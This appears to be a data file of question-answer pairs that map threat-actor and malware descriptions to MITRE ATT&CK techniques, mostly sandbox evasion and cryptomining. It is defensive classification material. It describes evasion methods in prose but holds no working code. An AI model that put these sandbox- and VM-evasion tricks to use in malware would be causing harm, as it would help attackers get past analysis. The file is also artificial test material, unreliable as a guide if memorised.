+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot module ""Trickboot"" can write or erase the UEFI/BIOS firmware of a compromised device.","Tecnique: T1495 Firmware Corruption, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment.,"Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used XMRIG to mine cryptocurrency on victim systems.,"Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has distributed cryptomining malware.,"Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has deployed XMRig Docker images to mine cryptocurrency. TeamTNT has also infected Docker containers and Kubernetes clusters with XMRig, and used RainbowMiner and lolMiner for mining cryptocurrency.","Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bonadan can download an additional module which has a cryptocurrency mining extension.,"Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner has loaded coinmining software onto systems to mine for Koto cryptocurrency.,"Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate can deploy follow-on cryptocurrency mining payloads.,"Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has used xmrig to mine cryptocurrency.,"Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has the capability to run a cryptocurrency miner on the victim machine.,"Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has created and run a Bitcoin cryptocurrency miner.,"Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner harvested system resources to mine cryptocurrency, using XMRig to mine Monero.","Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can use system resources to mine cryptocurrency, dropping XMRig to mine Monero.","Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap is a kernel-mode rootkit used for cryptocurrency mining.,"Tecnique: T1496 Resource Hijacking, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Spalax, the threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.","Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel malware has employed just-in-time decryption of strings to evade sandbox detection.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can attempt to overload sandbox analysis by sending 1550 calls to printf.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal can check to determine if the compromised system is running on VMware.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta can make a random number of calls to the `kernel32.beep` function to hinder log analysis.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has the ability to perform anti-virtualization checks.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some versions of CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit.","Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can use junk code to generate random activity to obscure malware behavior.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads.","Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can sleep for a time interval between C2 communication attempts.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has embedded a ""vmdetect.exe"" executable to identify virtual machines at the beginning of execution.","Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon has the ability to use anti-detection functions to identify sandbox environments.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can detect if it is running within a sandbox or other virtualized analysis environment.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has contained a hardcoded list of IP addresses to block that belong to sandboxes and analysis platforms.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill has used several anti-emulation techniques to prevent automated analysis by emulators or sandboxes.,"Tecnique: T1497 Virtualization/Sandbox Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used a script that ran WMI queries to check if a VM or sandbox was running, including VMWare and Virtualbox. The script would also call WMI to determine the number of cores allocated to the system; if less than two the script would stop execution.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used tools that conducted a variety of system checks to detect sandboxes or VMware services.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel malware has used a series of checks to determine if it's being analyzed; checks include the length of executable names, if a filename ends with .Md5.exe, and if the program is executed from the root of the C:\ drive, as well as checks for sandbox-related libraries.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Evilnum has used a component called TerraLoader to check certain hardware and file information to detect sandboxed environments.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used macros to verify if a mouse is connected to a compromised machine.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has run system checks to determine if they were operating in a virtualized environment.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth can check for Windows product ID's used by sandboxes and usernames and disk serial numbers associated with analyst environments.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT can identify strings such as Virtual, vmware, or VirtualBox to detect virtualized environments.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can check to see if the infected machine has VM tools running.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BadPatch attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and motherboard information.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta can check system flags and libraries, process timing, and API's to detect code emulation or sandboxing.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has the ability to search for designated file paths and Registry keys that indicate a virtualized environment from multiple products.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CSPY Downloader can search loaded modules, PEB structure, file paths, Registry keys, and memory to determine if it is being debugged or running in a virtual environment.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate queries system resources on an infected machine to identify if it is executing in a sandbox or virtualized environment.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can search a compromised system's running processes and services to detect Hyper-V, QEMU, Virtual PC, Virtual Box, and VMware, as well as Sandboxie.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre can detect sandbox analysis environments by inspecting the process list and Registry.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny's dropper has checked the number of processes and the length and strings of its own file name to identify if the malware is in a sandbox environment.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious can run anti-sandbox checks using the Microsoft Excel 4.0 function GET.WORKSPACE to determine the OS version, if there is a mouse present, and if the host is capable of playing sounds.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox/virtualized environments.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax will check if it is being run in a virtualized environment by comparing the collected MAC address to c8:27:cc:c2:37:5a.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can detect VMWare via its I/O port and Virtual PC via the vpcext instruction.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT uses WMI to check the BIOS and manufacturer information for strings like ""VMWare"", ""Virtual"", and ""XEN"" and another WMI request to get the current temperature of the hardware to determine if it's a virtual machine environment.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GuLoader has the ability to perform anti-VM and anti-sandbox checks using string hashing, the API call EnumWindows, and checking for Qemu guest agent.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can check for specific usernames, computer names, device drivers, DLL's, and virtual devices associated with sandboxed environments and can enter an infinite loop and stop itself if any are detected.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex has checked the number of CPUs in the system to avoid being run in a sandbox or emulator.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu can run checks to verify if it is running within a virtualized environments including Hyper-V, VirtualBox or VMWare and will terminate execution if the computer name is “JOHN-PC.”","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NativeZone has checked if Vmware or VirtualBox VM is running on a compromised host.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D checks a number of system parameters to see if it is being run on real hardware or in a virtual machine environment, such as `sysctl hw.model` and the kernel boot time.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT can halt execution if it identifies processes belonging to virtual machine software or analysis tools.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum's loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE performs several anti-VM and sandbox checks on the victim's machine. One technique the group has used was to perform a WMI query SELECT * FROM MSAcpi_ThermalZoneTemperature to check the temperature to see if it’s running in a virtual environment.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P8RAT can check the compromised host for processes associated with VMware or VirtualBox environments.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX checks if VMware tools is running in the background by searching for any process named ""vmtoolsd"".","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of ""License.txt"" and exiting.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy has a module that checks a number of indicators on the system to determine if its running on a virtual machine.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can check the compromised host for the presence of multiple executables associated with analysis tools and halt execution if any are found.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can check for VMware-related files and DLLs related to sandboxes.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos searches for Sandboxie and VMware on the system.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin uses WMI to check BIOS version for VBOX, bochs, qemu, virtualbox, and vm to check for evidence that the script might be executing within an analysis environment.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST checked the domain name of the compromised host to verify it was running in a real environment.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady has the ability to determine if its runtime environment is virtualized.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has run several virtual machine and sandbox checks, including checking if `Sbiedll.dll` is present in a list of loaded modules, comparing the machine name to `HAL9TH` and the user name to `JohnDoe`, and checking the BIOS version for known virtual machine identifiers.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark can stop execution if the screen width of the targeted machine is not over 600 pixels.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader scans processes to perform anti-VM checks.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 has the ability to detect Windows Sandbox, VMWare, or VirtualBox by querying `Win32_ComputerSystem` to extract the `Manufacturer` string.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SodaMaster can check for the presence of the Registry key HKEY_CLASSES_ROOT\\Applications\\VMwareHostOpen.exe before proceeding to its main functionality.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck checks its directory location in an attempt to avoid launching in a sandbox.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can detect commonly used and generic virtualization platforms based primarily on drivers and file paths.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UBoatRAT checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can stop its execution when it recognizes the presence of certain monitoring tools.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: macOS.OSAMiner can parse the output of the native `system_profiler` tool to determine if the machine is running with 4 cores.,"Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware.","Tecnique: T1497.001 Virtualization/Sandbox Evasion: System Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system.,"Tecnique: T1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.,"Tecnique: T1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments.","Tecnique: T1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Spark has used a splash screen to check whether an user actively clicks on the screen before running malicious code.,"Tecnique: T1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used tools that collected `GetTickCount` and `GetSystemTimeAsFileTime` data to detect sandbox or VMware services.","Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has waited a specified time before downloading a second stage payload.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADFLICK has delayed communication to the actor-controlled IP address by 5 minutes.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can use a timer to delay execution of core functionality.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BendyBear can check for analysis environments and signs of debugging using the Windows API kernel32!GetTickCountKernel32 call.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has checked if the malware is running in a virtual environment with the anti-debug function GetTickCount() to compare the timing.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can call `NtDelayExecution` to pause execution.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has the ability to set a hardcoded and randomized sleep interval.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can wait 30 minutes before initiating contact with C2.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop has used the sleep command to avoid sandbox detection.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can determine when it has been installed on a host for at least 15 days before downloading the final payload.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to measure function timing. DRATzarus can also remotely shut down into sleep mode under specific conditions to evade
+detection.","Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can implement the `kernel32.dll` Sleep function to delay execution for up to 300 seconds before implementing persistence or processing an addon package.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor can perform a long sleep (greater than or equal to 3 minutes) to evade detection.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has used time measurements from 3 different APIs before and after performing sleep operations to check and abort if the malware is running in a sandbox.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can turn itself on or off at random intervals.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax has set an execution trigger date and time, stored as an ASCII Unix/Epoch time value.","Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy's installer has delayed installation of GoldenSpy for two hours after it reaches a victim system.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can sleep for 195 - 205 seconds after payload execution and before deleting its task.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
